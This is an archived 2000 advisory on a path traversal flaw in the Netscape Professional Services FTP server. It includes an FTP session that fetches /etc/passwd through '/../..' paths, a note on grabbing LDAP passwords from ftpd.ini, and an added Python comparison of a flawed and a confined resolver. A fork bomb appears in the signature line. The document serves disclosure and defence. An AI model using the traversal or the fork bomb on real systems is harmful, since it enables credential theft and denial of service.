SECURITYVULNS:DOC:372
Jun 22, 2000

Netscape FTP Server - "Professional" as hell :>

vulners.com

Standard disclaimer applies. These are my private opinions and
observations.

The Netscape Professional Services FTP server is used on high-performance
servers for accessing virtual webserver accounts etc. It works with LDAP
and seems to be quite often shipped by Sun with ISP installations.

Due to poor coding, the whole virtual server structure, the LDAP server and
other parts of the system are exposed to trivial attacks. There are also
several overflows, but who cares; this is much easier:

Long Live the Programmers!

$ ftp ftp.XXXX.xxx
Connected to ftp.XXXX.xxx.
220-FTP Server - Version 1.36 - (c) 1999 Netscape Professional Services
220 You will be logged off after 1200 seconds of inactivity.
Name (ftp.XXXX.xxx:lcamtuf): anonymous
331 Anonymous user OK, send e-mail address as password.
Password:
230 Logged in OK
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> cd ../../../dupa
550 Can't change directory to
"/www1/customer/www.XXXX.xxx/a/n/o/n/anonymous/dupa" because No such
file or directory

[Well… this won't work… uh, lovely physical path, btw ;]

ftp> cd /../../../dupa
550 Can't change directory to
"/www1/customer/www.XXXX.xxx/a/n/dupa" because No such file or
directory
ftp> cd /../../../../dupa
550 Can't change directory to
"/www1/customer/www.XXXX.xxx/a/dupa" because
No such file or directory

[Erm? Good God!]

ftp> cd /../../../../../../../../etc/dupa
550 Can't change directory to "/etc/dupa" because No such file or
directory
ftp> cd /../../../../../../../../etc/
250 CWD command successful.
ftp> get /../../../../../../../../etc/passwd KUKU
local: KUKU remote: /../../../../../../../../etc/passwd
200 PORT successfull, connected to A.B.C.D port 62437
150-Type of object is "unknown/unknown". Transfer MODE is BINARY.
150 Opening data connection
226 File downloaded successfully (602 bytes, 602 bytes xmitted)
602 bytes received in 1.71 secs (0.34 Kbytes/sec)
ftp> quit
221-Goodbye. You uploaded 0 and downloaded 1 kbytes.
221 CPU time spent on you: 0.100 seconds.

$ cat KUKU
root:x:0:1:Super-User:/:/sbin/sh
daemon:x:1:1::/:
bin:x:2:2::/usr/bin:
sys:x:3:3::/:
adm:x:4:4:Admin:/var/adm:

Consequences:

  • downloading / uploading any files to the remote system,
    regardless of the (poorly) implemented limits, with
    ftp daemon privileges (you can exploit e.g. /tmp races,
    download vital files from the system or from other accounts etc.),

  • this ftp server supports LDAP users; different LDAP
    accounts are served under a single physical UID. This means
    any user can access and eventually overwrite files
    on other accounts; as it is used in cooperation with the
    webserver, virtual web servers are usually affected,

  • by accessing e.g.
    /../../../../../../../../opt/netscape/ftpd/conf/ftpd.ini,
    you can simply grab the LDAP passwords.

Fix:

Switching to open source would be good. To developers: man chroot.
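The transcript above shows the server dropping ".." components from relative paths but resolving "/.." against its own root, which is exactly what walks it out of the virtual account. The following is an added example, not the daemon's code or the author's: it models that flawed resolution next to a confined resolver that normalises first and then refuses anything outside the account root. The ROOT value is constructed from the physical path the server leaked; a real daemon should still chroot and use realpath, since this check is purely lexical and ignores symlinks.

```python
import posixpath

# Constructed sample root, modeled on the physical path leaked in the
# transcript ("/www1/customer/www.XXXX.xxx/a/n/o/n/anonymous").
ROOT = "/www1/customer/www.XXXX.xxx/a/n/o/n/anonymous"


def naive_resolve(root, cwd, requested):
    """Model of the behaviour visible in the transcript (not the vendor's
    code): relative paths have every '..' dropped, while absolute paths are
    glued onto the root and normalised afterwards, so '/..' climbs out."""
    if requested.startswith("/"):
        return posixpath.normpath(root + requested)
    parts = [p for p in requested.split("/") if p and p != ".."]
    return posixpath.normpath(posixpath.join(root, cwd, *parts))


def confined_resolve(root, cwd, requested):
    """Hardened resolver: build the candidate path, normalise it, then check
    that it still lies under root. Returns None when the request escapes."""
    root = posixpath.normpath(root)
    if requested.startswith("/"):
        base = root
    else:
        base = posixpath.normpath(posixpath.join(root, cwd))
    candidate = posixpath.normpath(posixpath.join(base, requested.lstrip("/")))
    # Compare with a trailing slash so "/www1/customerX" cannot pass as
    # being inside "/www1/customer".
    if candidate != root and not candidate.startswith(root + "/"):
        return None
    return candidate


if __name__ == "__main__":
    for req in ("../../../dupa", "/../../../dupa", "/../../../../../../../../etc/passwd"):
        print(f"{req:42} naive -> {naive_resolve(ROOT, '.', req)}")
        print(f"{'':42} confined -> {confined_resolve(ROOT, '.', req)}")
```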


Michal Zalewski [[email protected]] [tp.internet/security]
[http://lcamtuf.na.export.pl] <=–=> bash$ :(){ :|:&};:
=-----=> God is real, unless declared integer. <=-----=